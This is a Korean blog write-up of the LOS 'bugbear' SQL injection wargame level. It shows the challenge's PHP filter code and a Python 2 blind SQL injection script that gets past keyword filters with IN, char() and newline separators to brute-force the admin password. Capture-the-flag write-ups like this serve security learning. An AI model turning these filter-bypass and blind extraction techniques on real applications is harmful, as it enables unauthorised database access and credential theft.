-
LOS bugbearWebHacking/Load Of Sql Injection 2018. 2. 15. 04:1412345678910111213141516171819<?phpinclude "./config.php";login_chk();dbconnect();if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~");if(preg_match('/\'/i', $_GET[pw])) exit("HeHe");if(preg_match('/\'|substr|ascii|=|or|and| |like|0x/i', $_GET[no])) exit("HeHe");$query = "select id from prob_bugbear where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}";echo "<hr>query : <strong>{$query}</strong><hr><br>";$result = @mysql_fetch_array(mysql_query($query));if($result['id']) echo "<h2>Hello {$result[id]}</h2>";$_GET[pw] = addslashes($_GET[pw]);$query = "select pw from prob_bugbear where id='admin' and pw='{$_GET[pw]}'";$result = @mysql_fetch_array(mysql_query($query));if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("bugbear");highlight_file(__FILE__);?>
cs
이번 문제는 hex에서 사용되는 0x, like가 막혀있다.
like를 대체할수있는것이 무엇이있을까 문법을 검색하다가 IN을 사용하면 될것같아서 in을 사용하여서 문제를 풀었다.'가 막혀있기때문에 char을 이용하였다.
12345678910111213141516171819202122232425262728293031import urllib2j = 1input_ = 33 #0passwd = ''i = 0num = 8while(True):url = 'https://los.eagle-jump.org/bugbear_431917ddc1dec75b4d65a23bd39689f8.php?no=0%0a||%0aid%0aIN(char(97,100,109,105,110))%0a%26%26%0a'url += 'left(right(pw,%d)' %(num)url += ',1)%0aIN'url += '(char(%d))' %(input_)print urlreq = urllib2.Request(url)req.add_header('User-Agent','Mozilla/5.0')req.add_header('cookie','PHPSESSID=p1fad2hverso8kg1fs3fndoof6')data = urllib2.urlopen(req).read()if '<h2>Hello admin</h2>' in data:print 'Search %s' %(chr(input_))passwd += chr(input_)input_ = 33num -= 1if len(passwd) == 8:breakelse:print chr(input_)+'failed'input_+=1print 'Key is '+passwdcs 'WebHacking > Load Of Sql Injection' 카테고리의 다른 글
LOS assassin (0) 2018.02.15 LOS giant (0) 2018.02.15 LOS darkknight (0) 2018.02.15 LOS golem (0) 2018.02.13 LOS skeleton (0) 2018.02.13